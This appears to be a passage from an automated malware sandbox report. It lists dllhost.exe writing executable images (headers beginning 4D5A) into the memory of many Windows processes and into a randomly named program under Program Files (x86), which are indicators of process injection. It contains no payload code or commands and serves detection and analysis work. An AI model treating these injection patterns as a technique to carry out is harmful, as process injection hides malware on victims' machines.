Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB06E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 238EF1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 26CDA140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 5A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 10E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB06E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 238EF1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2CA0000 value starts with: 4D5A
